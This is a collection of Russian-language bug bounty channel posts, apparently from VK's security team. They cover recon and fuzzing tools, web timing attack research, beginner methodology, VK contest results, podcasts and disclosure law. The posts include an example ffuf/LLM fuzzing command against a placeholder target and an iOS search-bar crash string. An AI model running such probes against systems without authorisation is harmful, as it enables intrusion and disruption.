🧐 Что это за инструмент и зачем он нужен?

Разведка — один из самых важных этапов в процессе поиска багов. Чем эффективнее вы ее проведете, тем больше шансов найти реальные баги.

Проблема в том, что используемый вами инструмент для «обхода» целевого приложения (паук) не всегда может найти тот самый функционал, поэтому на помощь приходят URLFinder или waybackurls от багхантера Tom Hudson (tomnomnom).

URLFinder — это простой инструмент, который ориентирован на пассивное сканирование для поиска URL-адресов из источников, доступных в Интернете. Под капотом:

✔️ Специально подобранные пассивные источники для максимального всестороннего обнаружения URL-адресов.
✔️ Поддержка нескольких форматов вывода (JSON, файл, stdout) + STDIN/OUT для простой интеграции в существующие рабочие процессы.

🔥 GitHub

#инструменты

🕷5 лучших инструментов для поиска багов методом белого ящика

Поиск багов методом белого ящика можно автоматизировать с помощью различных инструментов, которые упрощают, ускоряют и улучшают результаты поиска багов. Использовать этот подход можно в багбаунти-программах, в которых предусмотрены соответствующие условия, — есть исходники приложения или их можно получить самому.

В отличие от типичного сценария багбаунти, в данном случае вы имеете доступ к исходникам целевого приложения. Поэтому вам понадобятся IDE или редактор кода, отладчик, фаззер и инструмент SAST для отслеживания рабочего процесса обработки кода и обнаружения шаблонов в коде.

Фаззеры особенно незаменимы, поскольку они могут работать локально на вашей системе, не испытывая проблем с сетевыми задержками или ограничениями скорости.

Команда багбаунти-платформы YesWeHack описала, пожалуй, самые полезные инструменты в каждой из этих категорий, а также эффективный инструмент для поиска соответствующей документации:

1️⃣ Visual Studio Code
2️⃣ Visual Studio Code debugger
3️⃣ SonarQube
4️⃣ American Fuzzy Lop plus plus (AFL++)
5️⃣ DevDocs

#инструменты

🕷 Как узнать секреты веб-сервера, включая спрятанные неправильные конфигурации, слепое внедрение структур данных, скрытые роуты к запрещенным зонам?

В этом могут помочь web timing атаки, но не те, о которых вы знаете в теории и пробовали на стенде, а работающие на практике. James Kettle, директор по исследованиям в PortSwigger, знает, о чем говорит.

Его новое исследование посвящено эффективным методам выявления неправильных настроек и багов на стороне сервера, а также проблем с reverse proxy:

1️⃣ Web timing атаки используют измерения времени ответа веб-сервера для выявления багов (неправильных настроек или ошибок в реализации алгоритмов на сервере). Современные технологии позволяют определять различия в миллисекундах, что делает такие атаки возможными даже в реальных условиях.

2️⃣ Теоретические ограничения и их преодоление: раньше считалось, что web timing атаки не могут быть эффективными из-за сетевого шума и задержек. Однако, исследование демонстрирует, как новые подходы могут минимизировать эти помехи и точно обнаружить даже самые тонкие различия.

3️⃣ Использование в реальных условиях включает методы для автоматического обнаружения и эксплуатации этих багов. Вы можете использовать приведенные в исследовании наработки для тестирования безопасности реальных веб-приложений и сервисов, чтобы находить:

🔘 Server-side injection
🟠Blind SQLi
🟠Blind JSON injection
🟠Blind server-side parameter pollution
🔘 Reverse proxy misconfiguration
🟠Scoped SSRF
🟠Firewall bypass
🟠Hidden destinations
🟠Front-end rule bypass
🟠Front-end impersonation

🔗 Читать исследование (+ PDF)
🔗 Смотреть выступление на DEF CON

#практика

День Неизвестного солдата — памятная дата в России, с 2014 года отмечаемая ежегодно 3 декабря в память о российских и советских воинах, погибших в боевых действиях на территории страны или за её пределами.

🕷 Что будет, если объединить инструмент веб-фаззинга вроде ffuf с большими языковыми моделями (LLM, Large Language Model)?

Эту идею подхватила команда Invicti Security, реализовав инструмент brainstorm. Он использует ИИ для генерации путей и имён файлов, комбинируя традиционные методы фаззинга с новыми, основанными на искусственном интеллекте. Это позволяет находить больше эндпоинтов с меньшим количеством запросов.

⚙️ Как работает инструмент?

✔️ Извлекает начальные ссылки с целевого веб-ресурса.
✔️ Использует LLM-модели для анализа структуры и предложения новых путей.
✔️ Фаззит эти пути с помощью ffuf.
✔️ На основе найденных данных генерирует новые предложения путей и повторяет процесс.

Один из полезных кейсов — обработка коротких имён файлов в IIS старых версий и их расшифровка с помощью LLM. А ниже — простой пример запуска инструмента с кастомными циклами и моделью:

python fuzzer.py "ffuf -w ./fuzz.txt -u http://target.com/FUZZ" --cycles 100 --model llama2:latest

P. S. Применение LLM для разведки — отличная идея, но в итоге эффективность последней может упереться в размеры модели.

🔗 GitHub
🔗 Анонс инструмента

#инструменты

🕷 Привет, багхантеры! Начало зимы — повод попробовать что-то новое ❄️

Мы хотим переформатировать наше сообщество в площадку для обучения и профессионального общения. Давайте больше обмениваться опытом и находить больше крутых багов!

🥷 Разработка методологии багбаунти: руководство для начинающих

На багбаунти-платформе Intigriti недавно вышло руководство по этой теме, поэтому давайте разберемся, с чего начинать багхантерам без опыта.

Методология поиска уязвимостей — это ваш уникальный подход к цели, своего рода пошаговый процесс, который должен помочь вам найти наибольшее количество багов. У каждого свой уникальный подход к поиску.

🕷 Крепкая база — залог успеха. Изучение основ веб-безопасности должно следовать только после изучения основ построения веба.
🕷 Определите ваши сильные стороны, чтобы глубже изучить определенный класс веб-уязвимостей, стек технологий или тип цели.
🕷 Постоянная практика и совершенствование. Как итог — вы начнете генерировать уникальные идеи, с помощью которых будете быстрее приближаться к цели.
🕷 Разработка автоматизированной системы и чек-листа. Если вы постоянно повторяете одни и те же действия при выполнении определённой задачи, автоматизируйте их для экономии времени. Чек-лист поможет обеспечить последовательность в тестировании.

🤝 Несколько дополнительных советов, которые можно продолжать до бесконечности:

✅ Доводите каждую цель до логического завершения, но не перегибайте. Здесь важен баланс — если за определенное вами время ничего не нашлось, лучше вернуться к цели позже.
✅ Следите за изменениями в программе и ваших целях.
✅ JavaScript-файлы — золотая жила. Не пренебрегайте анализом исходников.
✅ Сохраняйте заметки об интересном поведении.
✅ Выберите программу в соответствии со скиллами.
✅ Ознакомьтесь с документацией по продукту, который исследуете.
✅ Шансы найти баги в программе с большим скоупом намного выше. Не забывайте об этом.

🕷 Bug Bounty Ru

💭 Что из этого вы считаете наиболее полезным?

#этобаза

Месяц невиданной щедрости

Повышаем оплату всех найденных IDOR во всех программах VK Bug Bounty! 😲
🗓 До 28 декабря

И это плюсом к Bounty pass#3: Advent и накопительному бонусу, которые будут действовать до 19 декабря.

А ведь это еще и крутая возможность получить приглашение на BB Advent Party!

❓Помните, что если до 10 декабря сдать 3 оплачиваемых отчёта или уязвимости совокупно на 300 000 рублей, то вы попадете на нашу новогоднюю вечеринку для багхантеров?

Как говорится, ни слова больше – пора искать IDOR-ы! 🚀

#bugbounty #bountypass #advent

У коллег из PT появилась кнопка "остановить атаку" мы пошли дальше - у нас она не работает. Только реальные атаки, только хардкор.

Финал Bounty pass#2: Olymp

В VK подвели итоги Bounty pass#2: Olymp – поздравляем всех-всех призеров с завоеванными наградами👏

В числе призеров всего 26 багхантеров, включая победителей (mr4nd3r50n и act1on3).
🥇Золото у 12 олимпийцев,
🥈 Серебро – у двух,
🥉 а бронзу получили 12 багхантеров.

Все призеры получат уникальные наборы мерча в соответствии с завоеванной наградой, а также приглашение на новогоднюю вечеринку BB Advent Party 19 декабря в Москве 🎄

У вас тоже есть возможность попасть на эту вечеринку – надо успеть до 10 декабря сдать 3 оплачиваемых отчета ( или уязвимости совокупно на 300 000 рублей) в программу VK.

Желаю всем удачи!

Заряжаем на успех в баг баунти. Хорошей охоты, друзья!

Bounty pass#3: Advent – финальное событие юбилейного года VK Bug Bounty

Ребята из VK сегодня запустили новое событие Bounty pass#3: Advent, в котором все участники смогут:

✔️Увеличить накопленные бонусы с Bounty pass#1: Progress и Bounty pass#2: Olymp, забирая +5% с каждым новым оплачиваемым отчетом до 19 декабря.

✔️ Получать подарки из адвент-календаря с каждым новым оплачиваемым отчетом (или за каждые 100 000 рублей в отчёте)

✔️ Приглашение на новогоднюю вечеринку BB Advent Party 19 декабря, куда пойдут:

🏆 все победители и топ-20 призёров Bounty pass #1: Progress,
🥇все призеры и победители Bounty pass #2: Olymp, а также
👾 все, кто сдаст 3 оплачиваемых отчёта или получит суммарную выплату на 300 и более тысяч рублей в Bounty pass #3: Advent до 10 декабря 2024 года.

Спешите сдать свой отчет в программе VK на платформе Bugbounty.ru!

⭐️ Новые призеры Bounty pass#2: Olymp

Это последний апдейт в таблице олимпийцев перед подведением итогов Bounty pass#2: Olymp – победителей объявим 25 октября.

А пока давайте поздравим:

🥇 zerodivisi0n и r0hack, которые поднялись на верхнюю ступеньку нашего багхантерского пьедестала

🥈 cutoffurmind – с завоеванным серебром

🥉 Dandomi, circuit и lobity с тем, что ворвались в борьбу и уверенно завоевали бронзу

Да, Bounty pass#2: Olymp завершится вечером 21 октября, но это не повод расстраиваться. У вас еще есть время, чтобы сдать отчеты о найденных уязвимостях, накопить бонус и попасть в число олимпийских призеров. На кону – уникальные наборы мерча, а победители получат несгораемый бонус 10% на целый год.

🚀Спешите в программы VK Bug Bounty на платформах Standoff, BI.ZONE и Bugbounty.ru.

#bugbounty #bountypass #olymp

https://habr.com/ru/companies/ruvds/articles/851106/

Перефразируя старый спич, можете ли вы сами чинить/ломать свой авто. Можете, но рассказывать об этом можно только автопроизводителю.

Законопроект № 509708-8 «О внесении изменений в статью 1280 части четвертой Гражданского кодекса Российской Федерации (об использовании программ для ЭВМ и баз данных)» был принят 16 октября в первом чтении.

Данный нормативный акт дает право любому пользователю «без согласия правообладателя и без выплаты вознаграждения изучать, исследовать или испытывать функционирование программы для ЭВМ или базы данных в целях выявления недостатков для их безопасного использования или поручить иным лицам осуществить эти действия».

Это возможно при соблюдении ряда условий. Прежде всего, все эти действия должны «осуществляться исключительно в отношении экземпляров программ для ЭВМ или баз данных, функционирующих на технических средствах пользователя».

Кроме того, информацию об обнаруженных недостатках запрещается передавать третьим лицам. Исключение составляют лишь правообладатель или лица, осуществляющего переработку ПО с согласия правообладателя.

Исследователь также должен в течение пяти рабочих дней уведомить правообладателя об обнаруженных недостатках. Исключение допустимо, если местонахождение правообладателя определить не удалось.

👋Привет! Это канал команды информационной безопасности VK. Здесь мы будем делиться новостями, анонсами мероприятий и ссылками на открытые вакансии. И конечно, обсуждать нашу программу Bug Bounty.

Встретились как-то три багхантера и пентестер…

Так бы мог начаться какой-нибудь анекдот, но нет – это про новый выпуск Портрет багхантера в подкасте «Рынок уязвимостей» от Global Digital Space.

Мы пригласили Юрий Ряднина (circuit), Алексей Трофимов (Kwel), Дмитрий Прохоров (ratel_xx), чтобы поближе познакомиться с их личными историями, узнать о том, что их больше всего мотивирует в Bug Bounty, а что приносит разочарование и «боль».

И конечно, в выпуске обсудили:
🔹 Триаж, программы и платформы
🔹 Раскрытие отчетов
🔹 Этика и конкуренция в сообществе
🔹 Новое поколение багхантеров
🔹 Советы начинающим от профи

Ведущий этого выпуска – Сергей Зыбнев, пентестер и основатель проекта poxek.

Смотрите выпуск на платформах:

📱 VK Видео | 📱YouTube | 📺 RUTUBE

Подключайтесь! Будет интересно как новичкам, так и профи. 👉

Любите совать кавычки куда-попало? Настало время ввести в поисковую строку вашего iphone/ipad следующие символы: ""::

Зачастую стоит задача получить IPA файл для тестирования iOS приложения, но файл вам не предоставили, а под jailbreak версию iPhone приложения просто-напросто нет. Но есть выход, как получить искомый IPA.

🌐🌐

Первый подкаст про Рынок уязвимостей в совокупности посмотрело более 30 000 человек

и мы не останавливаемся и продолжаем знакомить Вас с героями и инструментами по оценке защищенности

Новый эпизод подкаста "Рынок уязвимостей" | Проект «Кибериспытание»

☑Что такое «Кибериспытание» и зачем оно бизнесу?
☑Как компании тестируют свою безопасность без риска?
☑И что об этом думают CISO и хакеры?

Разбираем всё по полочкам с экспертами:
🔹 Вячеслав Левин (Генеральный директор «Кибериспытания»)
🔹 Руслан Сулейманов (Директор по цифровой трансформации Innostage)
🔹 Сергей Павлов (Заместитель генерального директора по ИБ Т-Страхования, член экспертного совета проекта)
Ведущий - Лука Сафонов (Основатель Bugbounty.ru)

Что обсудили:
🎯Почему проект «Кибериспытание» — это не просто очередной пентест или баг баунти?
🎯 Как компании проходят этот тест на прочность и что получают взамен?
🎯 В чем польза для CISO и бизнеса?
🎯 Как хакеры относятся к модели «оплата за результат»?
🎯 Насколько это реально безопасно для участников?
🎯 Почему для развития проекта нужна экспертиза всей индустрии?

Будет живо, остро и с реальными кейсами!

Выбирайте где смотреть:
📺 YouTube | 📺 VK Video |📺 RUTUBE

Полезные ссылки:
Кибериспытание
Innostage
BugBountyRu
Ссылка на статью, про которую говорили эксперты

🔔 подписывайтесь на канал, чтобы не пропустить новые выпуски подкастов

⚡️Что такое Bug Bounty, какие модели программ есть в мире и каковы перспективы развития?

Обсудили в новом выпуске подкаста «Безопасный выход» с Петром Уваровым, Head of VK Bug Bounty.

Смотрите подкаст и вы узнаете:

• какие самые крупные площадки Bug Bounty существуют в России;
• в чем разница пентеста и Bug Bounty;
• как много багхантеров в России, и сколько они могут зарабатывать;
• какие бонусы для своих багхантеров готовит площадка VK;
• какая ответственность предусмотрена для платформ Bug Bounty и багхантеров в России.

▶️VK Видео

▶️Rutube

▶️YouTube

🎼Podster

Делитесь своими впечатлениями в комментариях под видео!
#подкаст #БезопасныйВыход

Пример того, как должны выглядеть адекватные вилки критичности уязвимостей.

Максимальная выплата конечно маленькая, но если смотреть на low, medium и high, то это выше почти всех компаний у которых максимальная выплата 500к+.

🌐🌐

Без воды, только практика.
Без цензуры, только правда.
Всё, что вы хотели узнать из первых уст.

Мы запускаем серию подкастов

Рынок уязвимостей: как устроен рынок багбаунти в России | Эпизод 1

В первом эпизоде подкаста узнаем, чем сегодня живет «мир багбаунти» в России и исследуем, как эти программы трансформируют рынок кибербезопасности.
Обсудим, как компании используют багбаунти для повышения безопасности, какие ведущие платформы и инициативы существуют в России.

В гостях у Луки Сафонова
(основатель bugbounty.ru)

Андрей Левкин (Руководитель продукта BI.ZONE Bug Bounty) и
Анатолий Иванов (Руководитель платформы Standoff Bug Bounty)

Выбирайте, где смотреть

📺 YouTube

📱 VK

🔔RUTUBE

Полезные ссылки:
Standoff 360
Positive Technologies
BI.ZONE
BI.ZONE Bug Bounty
BugBountyRu
Киберполигон

В таблице Bounty pass#2: Olymp растет число призеров

Наступил сентябрь, дети вернулись в школу, а багхантеры втянулись в «олимпиаду» Bounty pass#2. В турнирной таблице Olymp уже 20 призеров!

Поздравляем новых олимпийцев 👏
🥇byq, cry и act1on3 уверенно ворвались в соревнование, а brain переместился на ступеньку выше
🥈 новый участник bratka
🥉сразу четыре новичка в этой категории ratel_xx, mrd0x1, savAnna, cutoffurmind

Напомню, что до окончания Bounty pass#2: Olymp осталось чуть больше месяца, еще есть время сдать свои отчеты в программу VK

Митап от одной из сильнейших ИБ команд в РФ: https://habr.com/ru/companies/vk/news/842222/

Три багбаунтеря. Андрей, Анатолий и еще один.

⚡Апдейт в таблице олимпийцев Bounty pass#2 от VK:
🥇mr4nd3r50n , al88nsk , adsec2s присоединились к kedr в строчке золотых призеров
🥈первое серебро забрал brain
🥉сразу 6 новых бронзовых медалей у arkiix, artebels , wob1s , zerodivisi0n , r0hack, mimicate
Поздравляем всех медалистов! 👏👏👏

Соревнование идет полным ходом - еще есть время отправить свой отчет в программу VK и взобраться на Olymp.🏆

Сотни, а может и тысячи багхантеров (с) продают зиродеи в КГБ через платформы багбаунти, а на вырученные деньги пьют водку с медведями.

Российские платформы bug bounty имеют высокую вероятность существенного роста в ближайшие несколько лет. Они предоставляют надежную западную альтернативу не только российским хакерам, но и всем другим исследователям уязвимостей, находящимся в странах, которые потенциально могут столкнуться с международными финансовыми санкциями в будущем.

С западной точки зрения потенциально проблемным развитием событий может стать то, что российские хакеры решат продать уязвимости, обнаруженные в западных продуктах, российским компаниям по приобретению уязвимостей нулевого дня, таким как [данные удалены]. Таким образом, вместо того, чтобы сообщать о них на западные платформы bug bounty бесплатно, они продают их тому, кто заплатит больше.

Эти компании по приобретению уязвимостей нулевого дня в свою очередь продают их российским правоохранительным органам и службам безопасности, что может привести к усилению шпионских кампаний в западных странах. Западным политикам было бы полезно следить за развитием российской экосистемы bug bounty.

https://www.csoonline.com/article/3487397/bug-bounty-programs-take-root-in-russia-with-possible-far-reaching-implications.html

Программа вознаграждения за безопасность от Google Play (GPSRP - Google Play Security Reward Program), как сообщает Google Bug Hunters закрывается в последний день лета 2024. В течение почти семи лет компания платила тем, кто находил уязвимости в приложениях Android, которые были доступны пользователям в Google Play .

В 2017 году, когда была запущена программа, число разработчиков-участников было ограничено. За время работы GPSRP их количество увеличилось. Участниками программы стали такие разработчики приложений Android, как Airbnb, Alibaba, Amazon, Dropbox, Facebook, Grammarly, Instacart, Line, Lyft, Opera, Paypal, Pinterest, Shopify, Snapchat, Spotify, Telegram, Tesla, TikTok, Tinder, VLC и Zomato и др.

По сообщению Google, данные об уязвимостях компания использовала для создания автоматизированных проверок, которые сканировали все приложения Google Play на предмет схожих уязвимостей. В 2019 году Google заявила, что это помогло более чем 300 000 разработчиков исправить более 1 000 000 приложений в Google Play.

Программу закрывают из-за значительного уменьшения числа уязвимостей в приложениях.

Я здесь, за эту улицу стою! Пацаны мне всё, и я всё пацанам! Кто меня знает, тот в курсе!

https://tv.rbc.ru/archive/chez/66c4d3882ae596b39746ab39

https://habr.com/ru/news/837170/

Полезно - лайк, херня - дизлайк. Го.